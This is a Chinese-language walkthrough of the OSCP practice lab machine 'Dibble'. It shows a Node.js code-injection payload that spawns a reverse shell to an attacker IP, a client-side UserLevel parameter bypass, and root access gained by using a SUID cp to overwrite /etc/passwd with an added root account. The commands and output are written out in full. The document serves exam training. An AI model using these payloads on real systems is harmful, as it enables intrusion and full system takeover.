OSCP靶场--Dibble
考点(前端鉴权参数修改+node.js代码注入 + suid cp提权 )
1.nmap扫描
bash
##
┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.173.110 -sV -sC -Pn --min-rate 2500 -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2024-04-09 06:36 EDT
Nmap scan report for 192.168.173.110
Host is up (0.28s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.45.207
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey:
| 256 cd:dc:05:e6:e3:bb:12:33:f7:09:74:50:12:8a:85:64 (ECDSA)
|_ 256 a0:90:1f:50:78:b3:9e:41:2a:7f:5c:6f:4d:0e:a1:fa (ED25519)
80/tcp open http Apache httpd 2.4.46 ((Fedora))
|_http-server-header: Apache/2.4.46 (Fedora)
|_http-generator: Drupal 9 (https://www.drupal.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/
| /user/password/ /user/login/ /user/logout/ /index.php/admin/
|_/index.php/comment/reply/
|_http-title: Home | Hacking Articles
3000/tcp open http Node.js (Express middleware)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
27017/tcp open mongodb MongoDB 4.2.9
|_mongodb-info: ERROR: Script execution failed (use -d to debug)
| mongodb-databases:
| ok = 1.0
| totalSize = 307200.0
| databases
| 0
| sizeOnDisk = 131072.0
| name = account-app
| empty = false
| 1
| sizeOnDisk = 40960.0
| name = admin
| empty = false
| 2
| sizeOnDisk = 61440.0
| name = config
| empty = false
| 3
| sizeOnDisk = 73728.0
| name = local
|_ empty = false
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.87 seconds
2.user priv
bash
## 3000端口是node.js应用:
http://192.168.173.110:3000/
## burp中node.js反弹shell
username=aaa&msg=(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(80, "192.168.45.250", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application form crashing
})();
###
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 80
listening on [any] 80 ...
192.168.173.110: inverse host lookup failed: Unknown host
connect to [192.168.45.250] from (UNKNOWN) [192.168.173.110] 42158
python -c 'import pty;pty.spawn("/bin/bash")'
[benjamin@dibble app]$ ^Z
zsh: suspended nc -lvvp 80
┌──(root㉿kali)-[~/Desktop]
└─# stty raw -echo;fg
[1] + continued nc -lvvp 80
[benjamin@dibble app]$ export TERM=xterm
[benjamin@dibble app]$ ls
app.js node_modules package-lock.json routes utils
bin package.json public server.sh views
[benjamin@dibble app]$ cd ~
[benjamin@dibble ~]$ ls
app local.txt
[benjamin@dibble ~]$ cat local.txt
55a058fd5a338eda11819f7a5c161c0b
[benjamin@dibble ~]$
注册一个用户aaa:bbb登陆:
显示只有管理员才能注册事件:
修改前端可控参数UserLevel绕过:
3. root priv
bash
## linpeas枚举:
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strings Not Found
strace Not Found
-rwsr-xr-x. 1 root root 91K Mar 26 2020 /usr/bin/gpasswd
-rwsr-xr-x. 1 root root 41K Jan 28 2020 /usr/bin/fusermount
-rwsr-xr-x. 1 root root 156K Apr 23 2020 /usr/bin/cp
####################
## cp suid覆盖/etc/passwd提权:
##
[benjamin@dibble ~]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin
systemd-coredump:x:999:997:systemd Core Dumper:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
systemd-timesync:x:998:996:systemd Time Synchronization:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
unbound:x:997:994:Unbound DNS resolver:/etc/unbound:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
chrony:x:996:993::/var/lib/chrony:/sbin/nologin
benjamin:x:1000:1000::/home/benjamin:/bin/bash
mongod:x:995:992:mongod:/var/lib/mongo:/bin/false
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
nginx:x:994:991:Nginx web server:/var/lib/nginx:/sbin/nologin
#####################
##
┌──(root㉿kali)-[~/Desktop]
└─# openssl passwd pass@123
$1$0u9R34Oq$BL8AGWccOv95x6nX2A2bT1
## 写入/tmp/passwd
[benjamin@dibble ~]$ cat /etc/passwd > /tmp/passwd
echo 'root1:$1$0u9R34Oq$BL8AGWccOv95x6nX2A2bT1:0:0:root1:/root:/bin/bash' >> /tmp/passwd
## /usr/bin/cp覆盖/etc/passwd
[benjamin@dibble ~]$ /usr/bin/cp /tmp/passwd /etc/passwd
[benjamin@dibble ~]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
root1:$1$0u9R34Oq$BL8AGWccOv95x6nX2A2bT1:0:0:root1:/root:/bin/bash
[benjamin@dibble ~]$ su root
Password:
su: Authentication failure
[benjamin@dibble ~]$ su root1
Password:
[root@dibble benjamin]# id
uid=0(root) gid=0(root) groups=0(root)
[root@dibble benjamin]#
4.总结:
bash
##
https://zekosec.com/2023/07/27/pg-writeup-dibble.html
##
https://ljdd520.github.io/2020/03/14/Node-js%E5%B8%B8%E8%A7%81%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%E4%B8%8E%E6%80%BB%E7%BB%93/
##
https://github.com/cyberheartmi9/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md